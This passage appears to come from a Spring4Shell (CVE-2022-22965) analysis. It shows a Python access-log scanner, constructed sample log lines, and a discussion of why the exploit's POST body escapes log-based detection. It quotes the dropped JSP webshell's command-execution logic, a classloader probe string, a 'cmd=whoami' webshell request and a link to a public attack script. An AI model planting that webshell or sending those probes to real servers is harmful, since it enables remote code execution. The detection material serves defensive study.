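    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)')
BINDER_PROBE = re.compile(r"class\.(module\.)?classloader", re.I)


def classify(line: str):
    """Tag one access log line: 'spring4shell-probe', 'webshell-hit' or None.
    Limit to keep in mind: the exploit's property assignments travel in the
    POST body, which an access log never records; only query-string probes
    and the later requests to the dropped JSP are visible here."""
    m = COMBINED.match(line)
    if not m:
        return None
    target = unquote(m.group("target"))  # attackers URL-encode freely
    if BINDER_PROBE.search(target):
        return "spring4shell-probe"
    if "tomcatwar.jsp" in target.lower() and m.group("status") == "200":
        return "webshell-hit"
    return None


def scan(lines):
    """Return (tag, line) for every suspicious line."""
    hits = []
    for line in lines:
        tag = classify(line)
        if tag:
            hits.append((tag, line))
    return hits


SAMPLE_LOG = [  # constructed sample lines, not captured traffic
    '10.0.0.5 - - [17/Apr/2024:01:59:00 +0000] "GET /?class.module.classLoader%5Bx%5D=x HTTP/1.1" 200 2 "-" "python-requests/2.31"',
    '10.0.0.5 - - [17/Apr/2024:01:59:01 +0000] "POST / HTTP/1.1" 200 2 "-" "python-requests/2.31"',
    '10.0.0.5 - - [17/Apr/2024:01:59:02 +0000] "GET /tomcatwar.jsp?pwd=j&cmd=whoami HTTP/1.1" 200 2051 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [17/Apr/2024:02:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    props = valve_properties(PAYLOAD_BODY)
    print("valve properties:", props)
    print("file written:", dropped_file(props))
    print("JSP source:", render_jsp(props["pattern"], PAYLOAD_HEADERS))
    for tag, line in scan(SAMPLE_LOG):
        print(tag, "<-", line)
```

Two things fall out of running it. The rendered pattern is a plain JSP (`<% if("j".equals(request.getParameter("pwd"))){ ... Runtime.getRuntime().exec(request.getParameter("cmd")) ... %>//`), written to `webapps/ROOT/tomcatwar.jsp` because `fileDateFormat` is empty. And in the sample log the `POST /` that actually carried the exploit is tagged as nothing, while the scanner-style query-string probe and the `tomcatwar.jsp?pwd=j&cmd=whoami` request are caught: access logs show the aftermath, so body inspection (a WAF or request logging at the application) is what catches the assignment itself.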
# III. References

* [Feifei, [Vulnerability analysis] 002 Reproducing Spring4Shell: Spring Core RCE JDK 9+ CVE-2022-22965](https://feifei.tw/springshell-spring-core-rce/)
* [[Day 1] - What is Spring Boot](https://ithelp.ithome.com.tw/articles/10213097)
* Attack script file: [spring-core-rce/test.py](https://github.com/dinosn/spring-core-rce/blob/main/test.py)
* [Spring4Shell arrives! Another critical Java-ecosystem vulnerability after Log4Shell](https://www.informationsecurity.com.tw/article/article_detail.aspx?aid=9792)
* [SpringCore0day/漏洞分析.pdf (vulnerability analysis)](https://github.com/craig/SpringCore0day/blob/main/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.pdf)

---